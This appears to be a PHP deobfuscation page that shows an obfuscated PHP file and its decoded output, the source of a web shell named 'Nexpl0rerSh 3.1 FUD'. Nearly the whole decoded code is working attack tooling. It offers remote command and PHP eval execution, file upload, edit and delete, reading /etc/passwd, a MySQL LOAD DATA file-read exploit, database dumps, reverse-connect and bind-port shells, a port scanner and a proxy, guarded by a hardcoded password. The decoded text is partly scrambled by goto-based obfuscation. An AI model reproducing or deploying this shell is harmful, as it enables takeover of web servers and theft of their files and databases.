Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto VTVhz; g2uxT: echo "\x5b\x6e\145\x78\x40" . getenv("\x48\124\124\120\x5f\x48\1..
Decoded Output download
<?php
goto VTVhz; g2uxT: echo "[nex@" . getenv("HTTP_HOST") . " ~]"; goto lBiCO; Wglr0: echo $uid; goto AMhUj; zKRhl: ini_get("safe_mode") == 0 ? $safemode = $safemode_off_msg : ($safemode = $safemode_on_msg); goto czAlQ; JoxvX: $safemode_on_msg = "<font color=red>Safe Mode: ON</font><br />"; goto vQJqc; dTS_Y: ini_get("allow_url_fopen") == 1 ? $auf = $auf_on_msg : ($auf = $auf_off_msg); goto tB_ou; HMyaE: if ($_POST["mode"] == "domkfile") { $dir == realpath(".") ? $file = $_POST["mkfile"] : ($file = $dir . $_POST["mkfile"]); $fh = fopen($file, "w+") or die("<font color=red>Error: cannot create file</font>"); $_POST["text"] = ini_get("magic_quotes_gpc") ? stripslashes($_POST["text"]) : $_POST["text"]; fwrite($fh, $_POST["text"]) or die("<font color=red>Error: cannot write to file</font>"); fclose($fh); $output .= "Made."; } goto PGCay; cJtgm: if ($_POST["mode"] == "sqlexploit") { $link = mysql_connect($_COOKIE["mysql_host"], $_COOKIE["mysql_user"], $_COOKIE["mysql_pass"]) or die(mysql_error()); $db = mysql_select_db($_COOKIE["mysql_name"]); $path = $_POST["path"]; $query = "CREATE TABLE `nexpl0it` (`path` longtext not null);"; $delete = "DROP TABLE `nexpl0it`;"; $bypass = "LOAD DATA LOCAL INFILE '{$path}' INTO TABLE nexpl0it;"; $fuck = "SELECT * FROM nexpl0it;"; mysql_query($delete); mysql_query($query); mysql_query($bypass) or die("Mysql-exploit-error : " . mysql_error()); $res = mysql_query($fuck) or die(mysql_error()); $txt = ''; while ($row = mysql_fetch_array($res)) { $txt .= $row[path] . "
"; } $output = "<form action=# method=POST><input type=hidden name=mode value=sqlwritefile>File : <b><input type=text name=path value='{$path}'>\xa<input type=submit value=Save> </b><br /><br />
<textarea rows=30 cols=100 name=newtext>" . htmlspecialchars($txt) . "</textarea></form>"; } goto l68qU; p9VuD: echo PHP_OS; goto hdKVK; BKIMW: ?>
<?php goto AM3A5; WzUtG: if ($_POST["mode"] == "tools") { switch ($_POST["nometool"]) { case "passwd": if (!($txt = file_get_contents("/etc/passwd"))) { $output = "Cannot open /etc/passwd"; } else { $output = nl2br($txt); } break; case "encoder": $output = "\xa <center>\xa <form action=# method=post><input type=hidden name=mode value=tools>
<input type=hidden name=nometool value=encoder>\xa <textarea name="plain" cols=50 rows=5>" . $_POST[plain] . "</textarea>
\x9 \x9<br><br>\xa\x9 <input type=submit value="calculate"><br><br>\xa \x9\x9</center>\xa <b>Hashes</b>:<br>
\x9 <center>md5 -
<input type=text size=50 onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="" . md5($_POST[plain]) . "" readonly>
\x9 <br>crypt - <input type=text size=50 onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="" . crypt($_POST[plain]) . "" readonly>\xa \x9\x9 <br>sha1 - <input type=text size=50 onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="" . sha1($_POST[plain]) . "" readonly><br>
\x9 \x9 crc32 - <input type=text size=50 onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="" . crc32($_POST[plain]) . "" readonly><br></center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="" . urlencode($_POST[plain]) . "" readonly>
<br>urldecode - <input type=text size=35 onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="" . urldecode($_POST[plain]) . "" readonly>\xa <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="" . base64_encode($_POST[plain]) . "" readonly></center><center>base64_decode - <input type=text size=35 onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="" . base64_decode($_POST[plain]) . "" readonly> </center>
<br><b>Base convertations</b>:\xa <center>dec2hex - <input type=text size=35 onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="" . dechex($_POST[plain]) . "" readonly><br>
</center></form>
"; break; case "scanner": $scandir = str_replace(realpath("."), '', $dir); $scannersh = $dir; if ($scannersh == '') { $scannersh = "/"; } chdir($scannersh); $evil = array("dc3", "Antichat", "s101", "nefastica", "n3tShell", "Nexen", "33rd", "c99", "c2007", "c100", "r57", "shell", "k0tw", "nexpl0rer", "paradox", "Upload", "ZipShell", "Usucktoo", "shell_exec", "exec", "DxShell", "Cod3rz", "Fire-Crash", "subzero"); $output .= "<br>Ho analizzato {$scannersh}<br>"; $checked = array(); foreach (glob("*.php*") as $file) { $a = fopen($file, "r+"); $b = fread($a, filesize($file)); for ($i = 0; $i < count($evil); $i++) { $me = array_reverse(explode("/", $_SERVER["PHP_SELF"])); $str = eregi($evil[$i], $b); if ($str !== FALSE and $file != $me[0] and !in_array($file, $checked)) { array_push($checked, $file); $output .= "Trovato Possibile {$evil[$i]} in <a class='link' href='{$scandir}{$file}' target='_blank'>{$file}</a><br>"; } } fclose($a); } break; case "proxy": $output = "<form method="post" action="#">url: <input name="url" type="text" size="50" />\xa\x9\x9\x9 <input type="submit" value="surf" /> \xa \x9 <input name="curl" type="checkbox" id="curl" value="curl" />\xa \x9 use curl <input name="fopen" type="checkbox" id="fopen" value="fopen" /> use fopen<br /> <input type="hidden" name="mode" value="proxysurf" />\xa </form><br /><br />"; break; } } goto s5L8R; Cpo1U: $uid = "Uid: " . getmyuid() . " Gid: " . getmygid() . "<br />"; goto NXSQq; KhM9W: ?>
" size="26" />
<input name="port" type="text" value="port..." size="10" />
<input name="submit" type="submit" value="BackConn" />
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"><form action=# method="post">
<div align="center"><strong>:: Bind Port :: </strong><br>
<input type="hidden" name="mode" value="bind" />
<input name="submit7" type=submit value="Bind port 31337" />
</div>
</form> </td>
</tr>
<tr>
<td style="border:#FFFFFF 1px solid;"><form action="#" method="post" name="sqlpanel" id="sqlpanel">
<div align="center"><strong>:: MySQL Panel :: </strong><br>
<input type=hidden name=mode value=loginsql />
<input name="user" type="text" value="<?php goto Pz8cq; q3akO: if ($_POST["mode"] == "sql_query") { $link = mysql_connect($_COOKIE["mysql_host"], $_COOKIE["mysql_user"], $_COOKIE["mysql_pass"]) or die(mysql_error()); $db = mysql_select_db($_COOKIE["mysql_name"]); isset($_POST["dbname"]) ? mysql_select_db($_POST["dbname"]) : (print ''); $query = mysql_query(urldecode(stripslashes($_POST["query"]))) or die("Error query: <b>{" . stripslashes($_POST[query]) . "}</b> mysql says:" . mysql_error()); $pars = array_keys(mysql_fetch_array($query)); $npars = count($pars); $qwords = explode(" ", $_POST["query"]); global $select, $table_name; if (strtolower($qwords[0]) == "select") { $select = TRUE; $nqw = count($qwords); for ($i = 0; $i < $nqw; $i++) { if (strtolower($qwords[$i]) == "from") { $table_name = $qwords[$i + 1]; break; } } } $parz = $pars; $p4rz = $parz; $output .= "<form id="table" name="table" method="post" action="#"><input type=hidden name=mode value=sql_query />
<input name="query" type="text" id="query" size="50" value="SELECT * FROM table_name" />
<input type="submit" name="Submit" value="Query" />
</form><form action=# method=post><input type=hidden name=mode value=dump_db><input name=dbname type=text value="" . $_COOKIE[mysql_name] . "" size="30">\xa<input type=submit value=DumpDb></form><form name="update" method=post action=#><input type=hidden name=mode value=update><input type=hidden name=conditions><input type=hidden name=table></form>
<table width="100%" border="1" cellspacing="0" cellpadding="0">\xa<tr>
<td width=30% valign=top>\xa<table width="100%" border="1" cellspacing="0" cellpadding="0">\xa \xa </tr>
<tr>
<td><center>--[ Table List ]--</center> </td>\xa </tr>"; $q = mysql_query("SHOW TABLES") or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $output .= "<tr>\xa <td><center><a class="link" href="javascript:document.table.query.value='SELECT * FROM " . $table[0] . "';document.table.submit();">" . $table[0] . "</a></center></td>
</tr>"; } $output .= "
</table></td>
<td width="70%" valign="top">
<table width="100%" border="1" cellspacing="0" cellpadding="0">\xa <tr>\xa <td><center>--[ Query Result ]--</center> </td>\xa </tr>\xa <tr><td><table cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="1%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr>\xa "; $output .= "<td> </td>\xa"; foreach ($pars as $par) { $output .= is_numeric($par) || $par == '' ? '' : "<td>" . $par . "</td>\xa"; } $output .= "</tr>"; mysql_data_seek($query, 0); while ($row = mysql_fetch_array($query, MYSQL_ASSOC)) { $w = ''; $i = 0; foreach ($row as $k => $v) { $name = mysql_field_name($query, $i); $w .= " `" . $name . "` = \'" . addslashes($v) . "\' AND"; $i++; } if (count($row) > 0) { $w = substr($w, 0, strlen($w) - 3); } if ($table_name == "mybb_users") { $w = " uid=\'" . $row["uid"] . "\' "; } if ($table_name == "phpbb_users") { $w = " user_id=\'" . $row["user_id"] . "\' "; } $output .= "<tr>"; $output .= "<td><a class="link" href="javascript:document.update.conditions.value='" . urlencode($w) . "';document.update.table.value='" . $table_name . "';document.update.submit();"><img src="" . $_SERVER["PHP_SELF"] . "?act=img&img=change" border=0 /></a><a class="link" href="javascript:document.table.query.value='" . urlencode("DELETE FROM `" . $table_name . "` WHERE" . $w . "LIMIT 1") . "';document.table.submit();"><img src="" . $_SERVER["PHP_SELF"] . "?act=img&img=delete" border=0 /></a></td>\xa"; foreach ($row as $pardd => $rowval) { if (!is_numeric($pardd) && !empty($pardd)) { if ($row[$pardd] == '') { $output .= "<td><font color=green><b>NULL</b></font></td>"; } else { $output .= "<td>" . $row[$pardd] . "</td>"; } } } $output .= "</tr>"; } $output .= "
</table></td>\xa </tr>\xa </table><hr size="1" noshade><br>"; } goto qVmmY; viyX4: $percentfree = round($freespace * 100 / $totalspace); goto bYNNj; PGCay: if ($_POST["mode"] == "delfile") { $dir == realpath(".") ? $file = $_POST["delfile"] : ($file = $dir . $_POST["delfile"]); unlink($file) or die("<font color=red>Error: cannot delete file</font>"); $output .= "File deleted."; } goto az06a; bOCOh: if ($_POST["mode"] == "doedit") { $dir == realpath(".") ? $file = $_POST["modfile"] : ($file = $dir . $_POST["modfile"]); $output .= $file . "<br />"; $fh = fopen($file, "w+") or die("<font color=red>Error: cannot open file</font>"); $_POST["newtext"] = ini_get("magic_quotes_gpc") ? stripslashes($_POST["newtext"]) : $_POST["newtext"]; fwrite($fh, $_POST["newtext"]) or die("<font color=red>Error: cannot write to file</font>"); fclose($fh); $output .= "Done."; } goto vEqeH; MDzli: ?>
";
</script>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td style="border:#FFFFFF 1px solid;"><form name=fedit action=# method=post>
<div align="center"> <strong>:: Edit file :: </strong><br>
<input type=hidden name=mode value=edit>
name
<input type=text name=modfile size="12">
<input type=submit value=edit>
</div></form></td>
<td style="border:#FFFFFF 1px solid;"><form action=# method=post>
<div align="center"><strong>:: Make File ::</strong><br />
<input type=hidden name=mode value=mkfile>
name
<input type=text name='mkfile' size="12">
<input name="submit" type=submit value=make>
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"> <form action=# name='delfile' method=post>
<div align="center"><strong>:: Delete File :: </strong><br>
<input type=hidden name=mode value=delfile>
name
<input type=text name='delfile' size="12">
<input type=submit value=unlink>
</div>
</form> </td>
</tr>
<tr>
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#" enctype="multipart/form-data">
<div align="center"><strong>:: upload :: </strong><br>
<input type="hidden" name="mode" value="upload2" />
<input name="myfile" type="file" id="myfile" value="Load..." size="20" />
<input type="submit" name="ok" value="do" />
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"><form action=# method=post>
<div align="center"><strong>:: Rename File :: </strong><br>
<input type="hidden" name="mode" value="renfile" />
<input type="text" name="oldname" value="0ld name" size="15" />
<input type="text" name="newname" value="New name" size="15" />
<input name="submit" type="submit" value="Ren" />
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"><form action="#" method="post">
<div align="center"><strong>:: Make Dir :: </strong><br>
<input type="hidden" name="mode" value="mkdir" />
name
<input name="mkdir" type="text" size="18" />
<input name="submit" type="submit" value="ok" />
</div>
</form> </td>
</tr>
<tr>
<td style="border:#FFFFFF 1px solid;"><form action=# method=post>
<div align="center"><strong>:: Cmd Execution :: </strong><br>
<input type=hidden name=mode value=cmd>
<input name=cmd size="26" tpye=text>
<input name="submit" type=submit value=exec>
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"><form action="#" method="post">
<div align="center"><strong>:: BackConn :: </strong><br>
<input type=hidden name=mode value=reverse />
<input name="ip" type="text" value="<?php goto YW3ht; n9akO: ?>
( <?php goto p9VuD; svfxX: echo addslashes(realpath(".")); goto gL0Qn; uHiaa: if ($_POST["mode"] == "dump_db") { $dump = "# Dumped by Nexpl0rerSh 3.1 FUD Release
"; $dump .= "# MySQL version: (" . @mysql_get_server_info() . ") running on " . getenv("SERVER_ADDR") . " (" . getenv("SERVER_NAME") . ") \xa"; $dump .= "# Database: " . $_POST["dbname"] . "
"; $dump .= "# " . $_COOKIE["mysql_user"] . ":" . $_COOKIE["mysql_pass"] . "@" . $_COOKIE["mysql_host"] . "
"; $db = $_POST["dbname"]; setcookie("mysql_name", $db); $link = mysql_connect($_COOKIE["mysql_host"], $_COOKIE["mysql_user"], $_COOKIE["mysql_pass"]) or die(mysql_error()); isset($_POST["dbname"]) ? mysql_select_db($_POST["dbname"]) : (print ''); $q = mysql_query("SHOW TABLES") or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $dump .= datadump($table[0]); } $file_name = $db . "_dump_" . date("d_M_Y") . "_Nexpl0rer." . sql; chdir($dir); $fp = fopen($file_name, "w+"); fwrite($fp, $dump); fclose($fp); $output .= "Dump saved in " . $dir; } goto lNz2p; kwJny: $pd = $e = explode(DIRECTORY_SEPARATOR, substr($dir, 0, -1)); goto MmW5c; S0MVT: foreach ($pd as $b) { $t = ''; $j = 0; foreach ($e as $r) { $t .= $r . DIRECTORY_SEPARATOR; if ($j == $i) { break; } $j++; } echo "<a class="link" href="javascript:document.folder.dir.value='" . urlencode(addslashes($t)) . "';document.folder.submit();"><b>" . htmlspecialchars($b) . DIRECTORY_SEPARATOR . "</b></a>"; $i++; } goto m_EEw; ZtUEj: if ($_POST["mode"] == "eval") { chdir($dir); eval(stripslashes($_POST["eval"])); die; } goto WM1_5; AM3A5: echo $reglobals; goto jzfaJ; MmW5c: $i = 0; goto S0MVT; qVmmY: if ($_POST["mode"] == "update") { $link = mysql_connect($_COOKIE["mysql_host"], $_COOKIE["mysql_user"], $_COOKIE["mysql_pass"]) or die(mysql_error()); $db = mysql_select_db($_COOKIE["mysql_name"]); $conditions = urldecode(stripslashes($_POST["conditions"])); $table = $_POST["table"]; $select = mysql_query("SELECT * FROM {$table} WHERE{$conditions}LIMIT 1") or die(mysql_error()); $output .= "\xa<form id="table" name="table" method="post" action="#"><input type=hidden name=mode value=sql_query />
<input name="query" type="text" id="query" size="50" value="SELECT * FROM table_name" />\xa <input type="submit" name="Submit" value="Query" />
</form><form action=# method=post><input type=hidden name=mode value=dump_db><input name=dbname type=text value="" . $_COOKIE[mysql_name] . "" size="30">\xa<input type=submit value=DumpDb></form><form name="update" method=post action=#><input type=hidden name=mode value=update><input type=hidden name=conditions><input type=hidden name=table></form>
<table width="100%" border="1" cellspacing="0" cellpadding="0">\xa<tr>\xa<td width=30% valign=top>
<table width="100%" border="1" cellspacing="0" cellpadding="0">
\xa </tr>
<tr>\xa <td><center>--[ Table List ]--</center> </td>\xa </tr>"; $q = mysql_query("SHOW TABLES") or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $output .= "<tr>\xa <td><center><a class="link" href="javascript:document.table.query.value='SELECT * FROM " . $table[0] . "';document.table.submit();">" . $table[0] . "</a></center></td>\xa </tr>"; } $output .= "
</table></td>
<td width="70%" valign="top">
<table width="100%" border="1" cellspacing="0" cellpadding="0">
<tr>
<td><center>--[ Query Result ]--</center> </td>\xa </tr>
<tr><td><form action=# method=post>\xa<input type=hidden name=mode value=update2>
<table cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="1%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
"; while ($row = mysql_fetch_array($select, MYSQL_ASSOC)) { foreach ($row as $k => $v) { $output .= "<tr><td>{$k}</td><td><input type=text name='{$k}' value='{$v}'></td></tr>"; } } $output .= "\xa</table><input type=hidden name=table value="" . $_POST["table"] . ""><input type=hidden name=conditions value="" . $_POST["conditions"] . ""><input type=submit value=Update></form></td></tr></table></td>
</tr>\xa </table>
"; } goto x1YkZ; ngXCB: function exa($cfe) { $res = ''; if (!empty($cfe)) { if (function_exists("exec")) { @exec($cfe, $res); $res = join("\xa", $res); } elseif (function_exists("shell_exec")) { $res = @shell_exec($cfe); } elseif (function_exists("system")) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif (function_exists("passthru")) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif (@is_resource($f = @popen($cfe, "r"))) { $res = ''; while (!@feof($f)) { $res .= @fread($f, 1024); } @pclose($f); } } return $res; } goto ogY64; wgueM: echo $_SERVER["SERVER_ADDR"]; goto c0I31; oNJrc: echo $gpc; goto vLfEF; KnCOR: function whicha($pr) { $path = exa("which {$pr}"); if (!empty($path)) { return $path; } else { return $pr; } } goto ngXCB; jzfaJ: echo $current_user; goto jTav2; NXSQq: if ($_POST["mode"] == '') { $_POST["mode"] = "ls"; } goto ctnEe; I41_y: $reglobals_on_msg = "<font color=green>Register Globals: ON</font><br />"; goto apvn8; wJg_X: echo $totalspace; goto feQhy; UDURP: ?>
" size="9" />
<input type="text" size="10" name="pass" value="<?php goto Sx0I4; QKbCa: ?>
<?php goto oNJrc; XmImr: $freespace = disk_free_space($dir); goto bsTlP; XBp7x: $totalspace .= " GB"; goto LoEfa; G8yfz: echo $error; goto A5MIx; KDbB3: if ($_POST["dir"] == '') { if ($_COOKIE["dir"] == '') { $dir = realpath("."); } else { $d = str_replace("\", DIRECTORY_SEPARATOR, $_COOKIE["dir"]); $d = str_replace("\\", "\", $_COOKIE["dir"]); $dir = $d; } } else { $dir = str_replace("\", DIRECTORY_SEPARATOR, $_POST["dir"]); $d = str_replace("\\", "\", $_POST["dir"]); setcookie("dir", $dir); } goto lm7Nb; rRUEz: if ($_GET[act] == "img") { header("Content-type: image/gif"); header("Cache-control: public"); header("Expires: " . date("r", mktime(0, 0, 0, 1, 1, 2030))); header("Cache-control: max-age=" . 60 * 60 * 24 * 7); header("Last-Modified: " . date("r", filemtime(__FILE__))); $image = $images[$_GET["img"]]; echo base64_decode($image); die; } goto Aqdh7; feQhy: ?>
(<?php goto OA1M9; x6Xi4: if ($_POST["mode"] == "renfile") { if (!rename($dir . $_POST["oldname"], $dir . $_POST["newname"])) { $output = "<font color=red>Cannot rename file</font>"; } else { $output = "File renamed."; } } goto BcLrB; wPR2p: echo isset($_COOKIE[mysql_name]) ? $_COOKIE[mysql_name] : "database"; goto EpBTa; J8nqh: $_nexpwd = "p4ssw0rdZ"; goto TYcYJ; vEqeH: if ($_POST["mode"] == "mkfile") { $dir == realpath(".") ? $file = $_POST["mkfile"] : ($file = $dir . $_POST["mkfile"]); $output .= "<form action=# method=post><input type=hidden name=mode value=domkfile><input type=hidden name=mkfile value='" . $_POST["mkfile"] . "'>
<textarea rows=30 cols=100 name=text></textarea><br /><input type=submit value=make></form>"; } goto HMyaE; ctnEe: if ($_POST["mode"] == "ls") { $output .= "<br /><br />Directory listing [ {$dir} ]<br /><div align=left>"; $output .= "<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>\xa\xa <td style="border-bottom:#FFFFFF 1px solid;" width="10%">perms</td>
<td style="border-bottom:#FFFFFF 1px solid;" width="5%"> </td>\xa <td style="border-bottom:#FFFFFF 1px solid;" width="50%">name</td>\xa <td style="border-bottom:#FFFFFF 1px solid;" width="20%">owner/group</td>
<td style="border-bottom:#FFFFFF 1px solid;" width="15%">actions</td>\xa </tr>"; $opendir = opendir($dir) or print "<font color=red>Can't open directory</font>"; $i = 1; while ($file = readdir($opendir)) { $color = "#333333"; $icons = array("txt" => "ext_txt", "ini" => "ext_txt", "sql" => "ext_txt", "php" => "ext_php", "pl" => "ext_pl", "html" => "ext_html", "htm" => "ext_html", "mp3" => "ext_mp3", "swf" => "ext_swf", "rar" => "ext_tar", "zip" => "ext_tar", "tar" => "ext_tar", "gz" => "ext_tar", "bz" => "ext_tar", "exe" => "ext_exe", "jpg" => "ext_jpg", "png" => "ext_jpg", "gif" => "ext_jpg"); if ($dir == realpath(".")) { if (is_file($file)) { $ext = array_pop(explode(".", $file)); if (array_key_exists($ext, $icons)) { $icon = $icons[$ext]; } else { $icon = "small_unk"; } if (function_exists("posix_getpwuid")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name] . "/" . $gr00p[name]; } else { $owner = fileowner($file) . "/" . filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) { $info = "<font color=red>{$info}</font>"; } elseif (!is_writable($file)) { $info = "<font color=white>{$info}</font>"; } else { $info = "<font color=green>{$info}</font>"; } $output .= " <tr style="background-color:" . $color . ";">\xa <td style="border-bottom:#FFFFFF 1px solid;">" . $info . "</td>
<td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://" . getenv("HTTP_HOST") . $_SERVER["PHP_SELF"] . "?act=img&img=" . $icon . "" /></td>\xa <td style="border-bottom:#FFFFFF 1px solid;">" . $file . "</td>
<td style="border-bottom:#FFFFFF 1px solid;">" . $owner . "</td>\xa <td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.fedit.modfile.value='" . $file . "';document.fedit.submit();"><img src="" . $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"] . "&act=img&img=change" border=0 /></a> - <a class="link" href="javascript:document.delfile.delfile.value='" . $file . "';document.delfile.submit();"><img src="" . $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"] . "&act=img&img=delete" border=0 /></a></td>\xa </tr>"; } else { if (function_exists("posix_getpwuid")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name] . "/" . $gr00p[name]; } else { $owner = fileowner($file) . "/" . filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) { $info = "<font color=red>{$info}</font>"; } elseif (!is_writable($file)) { $info = "<font color=white>{$info}</font>"; } else { $info = "<font color=green>{$info}</font>"; } $output .= " <tr style="background-color:" . $color . ";">\xa <td style="border-bottom:#FFFFFF 1px solid;">" . $info . "</td>
<td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://" . getenv("HTTP_HOST") . $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"] . "&act=img&img=folder" /></td>"; $output .= "<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value='" . addslashes(realpath($file)) . "';document.folder.submit();">" . $file . "</a></td>\xa\x9<td style="border-bottom:#FFFFFF 1px solid;">" . $owner . "</td>\xa <td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value='" . addslashes(realpath($file)) . "';document.folder.submit();">Go</a></td>\xa </tr>"; } } else { chdir($dir); if (is_file($file)) { $ext = array_pop(explode(".", $file)); if (array_key_exists($ext, $icons)) { $icon = $icons[$ext]; } else { $icon = "small_unk"; } if (function_exists("posix_getpwuid")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name] . "/" . $gr00p[name]; } else { $owner = fileowner($file) . "/" . filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) { $info = "<font color=red>{$info}</font>"; } elseif (!is_writable($file)) { $info = "<font color=white>{$info}</font>"; } else { $info = "<font color=green>{$info}</font>"; } $output .= " <tr style="background-color:" . $color . ";">
<td style="border-bottom:#FFFFFF 1px solid;">" . $info . "</td>
<td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://" . getenv("HTTP_HOST") . $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"] . "&act=img&img=" . $icon . "" /></td>\xa <td style="border-bottom:#FFFFFF 1px solid;">" . $file . "</td>\xa <td style="border-bottom:#FFFFFF 1px solid;">" . $owner . "</td>\xa <td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.fedit.modfile.value='" . $file . "';document.fedit.submit();"><img src="" . $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"] . "&act=img&img=change" border=0 /></a> - <a class="link" href="javascript:document.delfile.delfile.value='" . $file . "';document.delfile.submit();"><img src="" . $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"] . "&act=img&img=delete" border=0 /></a></td>\xa </tr>"; } else { if (function_exists("posix_getpwuid")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name] . "/" . $gr00p[name]; } else { $owner = fileowner($file) . "/" . filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) { $info = "<font color=red>{$info}</font>"; } elseif (!is_writable($file)) { $info = "<font color=white>{$info}</font>"; } else { $info = "<font color=green>{$info}</font>"; } $output .= " <tr style="background-color:" . $color . ";">\xa <td style="border-bottom:#FFFFFF 1px solid;">" . $info . "</td>
<td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://" . getenv("HTTP_HOST") . $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"] . "&act=img&img=folder" /></td>
<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value='" . addslashes(realpath($file)) . "';document.folder.submit();">" . $file . "</a></td>\xa\x9<td style="border-bottom:#FFFFFF 1px solid;">" . $owner . "</td>
<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value='" . addslashes(realpath($file)) . "';document.folder.submit();">Go</a></td>\xa </tr>"; } } $i++; } $output .= "</div>"; } goto zilZl; m_EEw: ?>
<br>
<br>
<?php goto G8yfz; a14x1: $freespace .= " GB"; goto XBp7x; apvn8: $reglobals_off_msg = stripslashes("<font color=red>Register Globals: OFF</font><br />"); goto niQR0; NxT89: die; goto juKuz; vLfEF: ?>
<?php goto gn1XG; LoEfa: $current_user = "Who are you? " . get_current_user() . "<br />"; goto Cpo1U; bYNNj: $percentbusy = 100 - $percentfree; goto eRXYx; EpBTa: ?>
" size="10" />
<input name="submit" type="submit" value="MySQL" />
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#">
<div align="center"><strong>:: PHP Execution :: </strong><br>
<input type="hidden" value="eval" name="mode" />
<input name="eval" type="text" size="30" />
<input type="submit" value="Eval" />
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"><form action=# method=post name="folder" id="folder">
<div align="center"><strong>:: Go Dir ::</strong> <br>
<input type=hidden name='mode' value='ls'>
<input type=text value='<?php goto ihQrV; Aqdh7: function getperms($perms) { if (($perms & 49152) == 49152) { $info = "s"; } elseif (($perms & 40960) == 40960) { $info = "l"; } elseif (($perms & 32768) == 32768) { $info = "-"; } elseif (($perms & 24576) == 24576) { $info = "b"; } elseif (($perms & 16384) == 16384) { $info = "d"; } elseif (($perms & 8192) == 8192) { $info = "c"; } elseif (($perms & 4096) == 4096) { $info = "p"; } else { $info = "u"; } $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; } goto RHFlS; NJm6N: ?>
' name='dir'>
<input type=submit value=change/list>
</div>
</form></td>
</tr>
<tr>
<td style="border:#FFFFFF 1px solid;"><div align="center">
<form method="post" action="#">
<strong>:: Proxy ::</strong> <br>
<input name="mode" type="hidden" id="mode" value="proxysurf" />
url: <input name="url" type="text" size="30" />
<input type="submit" value="surf" />
<input name="curl" type="checkbox" id="curl" value="curl" /> curl
<input name="fopen" type="checkbox" id="fopen" value="fopen" /> fopen<br />
</form></div>
</td>
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#">
<div align="center"><strong>:: File Change Mode:: </strong><br>
<input type="hidden" value="chmod" name="mode" />
<input name="filename" type="text" id="filename" value="file" size="15" />
<input name="filemode" type="text" id="filemode" value="mode" size="15" />
<input type="submit" value="Chmod" />
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#">
<div align="center"><strong>:: Port Scan :: </strong><br>
<input type="hidden" value="scan" name="mode" />
<input name="host" type="text" id="host" value="host" size="15" />
<input name="minport" type="text" value="max port" size="10" />
<input name="maxport" type="text" id="maxport" value="max port" size="10" />
<input type="submit" value="scan" />
</div>
</form> </td>
</tr>
</table>
<form action=# name=tools method=post>
<span class="Stile1">
<input type=hidden name=mode value=tools />
<input type=hidden name=nometool />
</span>
</form>
<span class="Stile1">
